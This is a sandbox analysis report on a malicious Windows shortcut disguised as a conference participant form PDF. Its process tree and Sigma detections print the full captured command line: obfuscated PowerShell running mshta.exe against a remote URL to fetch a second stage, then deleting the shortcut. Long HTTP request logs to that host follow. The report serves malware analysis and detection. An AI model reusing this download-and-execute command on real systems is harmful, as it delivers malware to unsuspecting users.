Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
T15hf0Y3mp.lnk

Overview

General Information

Sample name:T15hf0Y3mp.lnk
renamed because original name is a hash value
Original sample name:b8d97d29e99e1f96e06836468db56855dc09305e3ed663c720fe700ea4bf6e73.lnk
Analysis ID:1543062
MD5:558ed2a75be9da451504b5ef33eed93c
SHA1:4c9e126b112ac8c76029e062dbd7d31569e0ce57
SHA256:b8d97d29e99e1f96e06836468db56855dc09305e3ed663c720fe700ea4bf6e73
Tags:calendar-stib-com-ualnkuser-JAMESWT_MHT
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Powershell creates an autostart link
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious Parent Double Extension File Execution
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • forfiles.exe (PID: 7344 cmdline: "C:\Windows\System32\forfiles.exe" /p C:\ /m Windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7404 cmdline: . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 7508 cmdline: "C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 7836 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2, CommandLine: "C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7404, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2, ProcessId: 7508, ProcessName: mshta.exe
Sigma detected: Suspicious Parent Double Extension File Execution
Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p C:\ /m Windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg, ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 7344, ParentProcessName: forfiles.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 7352, ProcessName: conhost.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg, CommandLine: . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p C:\ /m Windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg, ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 7344, ParentProcessName: forfiles.exe, ProcessCommandLine: . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg, ProcessId: 7404, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7836, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: T15hf0Y3mp.lnkReversingLabs: Detection: 15%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Source: unknownHTTPS traffic detected: 185.68.16.189:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: Joe Sandbox ViewASN Name: UKRAINE-ASUA UKRAINE-ASUA
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /programy-nauczania/GIEAnnualConferenceStage2 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_author/css/by_author.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_onsales/css/by_onsales.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/quick_search/css/quick_search.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/css/html_types/select_radio_check.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/checkbox.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/radio.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/switcher.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/color.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2.3.8 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/husky.js?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.3.8 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tracker.js?ver=1.13.1 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /programy-nauczania/GIEAnnualConferenceStage2 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_author/css/by_author.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_onsales/css/by_onsales.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
